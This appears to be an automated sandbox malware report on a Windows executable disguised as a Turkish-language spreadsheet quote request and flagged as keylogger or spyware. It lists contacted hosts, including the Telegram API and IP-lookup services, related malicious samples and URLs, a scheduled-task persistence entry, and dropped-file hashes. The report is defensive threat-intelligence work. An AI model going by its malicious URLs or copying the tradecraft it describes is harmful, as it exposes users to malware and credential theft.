                                                  https://reallyfreegeoip.org/xml/TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003051000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  149.154.167.220
                                                  api.telegram.orgUnited Kingdom
                                                  62041TELEGRAMRUtrue
                                                  188.114.96.3
                                                  reallyfreegeoip.orgEuropean Union
                                                  13335CLOUDFLARENETUStrue
                                                  132.226.247.73
                                                  checkip.dyndns.comUnited States
                                                  16989UTMEMUSfalse
                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1528049
                                                  Start date and time:2024-10-07 14:51:12 +02:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 10m 2s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:21
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                  renamed because original name is a hash value
                                                  Original Sample Name:TEKLF TALEP VE FYAT TEKLF_xlsx.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winEXE@19/15@3/3
                                                  EGA Information:
                                                  • Successful, ratio: 50%
                                                  HCA Information:
                                                  • Successful, ratio: 99%
                                                  • Number of executed functions: 193
                                                  • Number of non-executed functions: 11
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                  • Execution Graph export aborted for target TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, PID 7944 because it is empty
                                                  • Execution Graph export aborted for target YzkHZRBcm.exe, PID 6504 because it is empty
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                  • VT rate limit hit for: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                  TimeTypeDescription
                                                  08:52:19API Interceptor8325370x Sleep call for process: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe modified
                                                  08:52:20API Interceptor27x Sleep call for process: powershell.exe modified
                                                  08:52:23API Interceptor6151187x Sleep call for process: YzkHZRBcm.exe modified
                                                  14:52:21Task SchedulerRun new task: YzkHZRBcm path: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  149.154.167.220rREQUESTFORQUOTE-INQUIRY87278.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                    SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      Yeni Sipari#U015f.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                        COMPANY PROFILE_pdf.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                          Pla#U0107anje,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              sam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  2i3Lj7a8Gk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    e4L9TXRBhB.exeGet hashmaliciousXWormBrowse
                                                                      188.114.96.3RFQ 245801.exeGet hashmaliciousFormBookBrowse
                                                                      • www.j88.travel/c24t/?9rm4ULV=iDjdFcjw5QZJ8NeJJL4ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+m2NwmP2xDXw&D4hl2=fT-dvVK08nUDKdF
                                                                      74qgPmarBM.exeGet hashmaliciousPonyBrowse
                                                                      • kuechenundmehr.com/x.htm
                                                                      PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                      • www.cc101.pro/ttiz/
                                                                      http://revexhibition.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                      • revexhibition.pages.dev/favicon.ico
                                                                      http://meta.case-page-appeal.eu/community-standard/112225492204863/Get hashmaliciousUnknownBrowse
                                                                      • meta.case-page-appeal.eu/assets/k9854w4e5136q5a-f2169603.png
                                                                      http://www.tkmall-wholesale.com/Get hashmaliciousUnknownBrowse
                                                                      • www.tkmall-wholesale.com/
                                                                      c1#U09a6.exeGet hashmaliciousUnknownBrowse
                                                                      • winfileshare.com/ticket_line/llb.php
                                                                      QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                      • filetransfer.io/data-package/eZFzMENr/download
                                                                      QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                      • filetransfer.io/data-package/eZFzMENr/download
                                                                      1tstvk3Sls.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                      • microsoft-rage.world/Api/v3/qjqzqiiqayjq
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      reallyfreegeoip.orgrREQUESTFORQUOTE-INQUIRY87278.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                      • 188.114.97.3
                                                                      SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                      • 172.67.177.134
                                                                      8038.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 188.114.96.3
                                                                      COMPANY PROFILE_pdf.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                      • 188.114.97.3
                                                                      #Uc740#Ud589_#Uc0c1#Uc138#Uc815#Ubcf4.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 188.114.96.3
                                                                      movimiento_INGDIRECT.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 188.114.97.3
                                                                      Pla#U0107anje,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 188.114.97.3
                                                                      Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 188.114.96.3
                                                                      sam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                      • 188.114.96.3
                                                                      ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 188.114.96.3
                                                                      checkip.dyndns.comrREQUESTFORQUOTE-INQUIRY87278.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                      • 193.122.130.0
                                                                      SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                      • 132.226.247.73
                                                                      8038.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 132.226.8.169
                                                                      COMPANY PROFILE_pdf.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                      • 132.226.8.169
                                                                      #Uc740#Ud589_#Uc0c1#Uc138#Uc815#Ubcf4.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 158.101.44.242
                                                                      movimiento_INGDIRECT.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 193.122.130.0
                                                                      Pla#U0107anje,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 193.122.6.168
                                                                      Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 132.226.247.73
                                                                      sam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                      • 158.101.44.242
                                                                      ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 193.122.6.168
                                                                      api.telegram.orgrREQUESTFORQUOTE-INQUIRY87278.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                      • 149.154.167.220
                                                                      SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                      • 149.154.167.220
                                                                      Yeni Sipari#U015f.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 149.154.167.220
                                                                      COMPANY PROFILE_pdf.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                      • 149.154.167.220
                                                                      Pla#U0107anje,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 149.154.167.220
                                                                      Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 149.154.167.220
                                                                      sam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                      • 149.154.167.220
                                                                      ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 149.154.167.220
                                                                      2i3Lj7a8Gk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 149.154.167.220
                                                                      e4L9TXRBhB.exeGet hashmaliciousXWormBrowse
                                                                      • 149.154.167.220
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      TELEGRAMRUrREQUESTFORQUOTE-INQUIRY87278.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                      • 149.154.167.220
                                                                      SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                      • 149.154.167.220
                                                                      Yeni Sipari#U015f.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 149.154.167.220
                                                                      COMPANY PROFILE_pdf.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                      • 149.154.167.220
                                                                      Pla#U0107anje,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 149.154.167.220
                                                                      Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 149.154.167.220
                                                                      sam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                      • 149.154.167.220
                                                                      ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 149.154.167.220
                                                                      2i3Lj7a8Gk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 149.154.167.220
                                                                      zncaKWwEdq.exeGet hashmaliciousVidarBrowse
                                                                      • 149.154.167.99
                                                                      CLOUDFLARENETUSPayment.vbsGet hashmaliciousFormBookBrowse
                                                                      • 188.114.96.3
                                                                      PAYMENT SPECIFIKACIJA 364846637-pdf.vbsGet hashmaliciousRemcosBrowse
                                                                      • 188.114.97.3
                                                                      RFQ 245801.exeGet hashmaliciousFormBookBrowse
                                                                      • 188.114.96.3
                                                                      original.emlGet hashmaliciousTycoon2FABrowse
                                                                      • 188.114.96.3
                                                                      https://globalairt.com/arull.php?7088797967704b536932307466507a53354b54456b744b3872584b3037555338375031633872445172564277413d1Get hashmaliciousUnknownBrowse
                                                                      • 104.17.25.14
                                                                      74qgPmarBM.exeGet hashmaliciousPonyBrowse
                                                                      • 188.114.96.3
                                                                      http://twbcompany.comGet hashmaliciousUnknownBrowse
                                                                      • 104.21.7.183
                                                                      https://danielvasconcellos.com.br/cliente2024Get hashmaliciousPhisherBrowse
                                                                      • 188.114.97.3
                                                                      SecuriteInfo.com.Win64.Evo-gen.20301.32747.exeGet hashmaliciousUnknownBrowse
                                                                      • 104.26.0.5
                                                                      https://bono-sicherheitstechniksharefile.btn-ebikes.com/Get hashmaliciousHtmlDropperBrowse
                                                                      • 104.18.95.41
                                                                      UTMEMUSSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                      • 132.226.247.73
                                                                      8038.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 132.226.8.169
                                                                      COMPANY PROFILE_pdf.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                      • 132.226.8.169
                                                                      Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 132.226.247.73
                                                                      2i3Lj7a8Gk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 132.226.247.73
                                                                      VX7fQ2wEzC.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 132.226.247.73
                                                                      jHSDuYLeUl.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 132.226.247.73
                                                                      na.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                      • 132.226.8.169
                                                                      Quote_ECM129_ Kumbih III.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 132.226.247.73
                                                                      INVOICE-COAU7230734290.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 132.226.247.73
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      54328bd36c14bd82ddaa0c04b25ed9adrREQUESTFORQUOTE-INQUIRY87278.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                      • 188.114.96.3
                                                                      SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                      • 188.114.96.3
                                                                      8038.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 188.114.96.3
                                                                      COMPANY PROFILE_pdf.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                      • 188.114.96.3
                                                                      #Uc740#Ud589_#Uc0c1#Uc138#Uc815#Ubcf4.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 188.114.96.3
                                                                      movimiento_INGDIRECT.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 188.114.96.3
                                                                      Pla#U0107anje,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 188.114.96.3
                                                                      Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 188.114.96.3
                                                                      sam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                      • 188.114.96.3
                                                                      ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 188.114.96.3
                                                                      3b5074b1b5d032e5620f69f9f700ff0ePayment.vbsGet hashmaliciousFormBookBrowse
                                                                      • 149.154.167.220
                                                                      PAYMENT SPECIFIKACIJA 364846637-pdf.vbsGet hashmaliciousRemcosBrowse
                                                                      • 149.154.167.220
                                                                      https://bono-sicherheitstechniksharefile.btn-ebikes.com/Get hashmaliciousHtmlDropperBrowse
                                                                      • 149.154.167.220
                                                                      Portal.msiGet hashmaliciousUnknownBrowse
                                                                      • 149.154.167.220
                                                                      http://46.27.141.62Get hashmaliciousUnknownBrowse
                                                                      • 149.154.167.220
                                                                      rREQUESTFORQUOTE-INQUIRY87278.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                      • 149.154.167.220
                                                                      SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                      • 149.154.167.220
                                                                      SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exeGet hashmaliciousUnknownBrowse
                                                                      • 149.154.167.220
                                                                      SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exeGet hashmaliciousUnknownBrowse
                                                                      • 149.154.167.220
                                                                      SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                      • 149.154.167.220
                                                                      No context
                                                                      Process:C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1216
                                                                      Entropy (8bit):5.34331486778365
                                                                      Encrypted:false
                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                      Malicious:true
                                                                      Reputation:high, very likely benign file
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                      Process:C:\Users\user\AppData\Roaming\YzkHZRBcm.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1216
                                                                      Entropy (8bit):5.34331486778365
                                                                      Encrypted:false
                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                      Malicious:false
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:modified
                                                                      Size (bytes):2232
                                                                      Entropy (8bit):5.379401388151058
                                                                      Encrypted:false
                                                                      SSDEEP:48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//MPUyus:fLHxvIIwLgZ2KRHWLOugss
                                                                      MD5:25321E5EF46D4B6586B432EDE14CDFB7
                                                                      SHA1:7B04466E0869735444E88F5F99045A021E104D5B
                                                                      SHA-256:D01CD798290DF4649DC4747E1130281BCB90400C1BABA2727D819D2626CCE70B
                                                                      SHA-512:4C5A5AEBCCF0426B10C11CAC0E2B935030FE539EF3582BC6AE4CCF052A9A7C6C35F3B8409123F59BDC7F0C35ABB9B433A4FAFFA50F856197A0B4712C8283BD40
                                                                      Malicious:false
                                                                      Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
